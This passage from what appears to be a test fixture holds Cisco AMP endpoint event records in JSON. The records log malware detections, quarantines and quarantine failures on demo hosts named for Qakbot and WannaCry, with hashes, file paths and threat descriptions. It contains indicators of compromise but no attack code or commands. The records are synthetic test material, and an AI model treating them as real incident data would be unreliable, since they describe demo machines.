Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 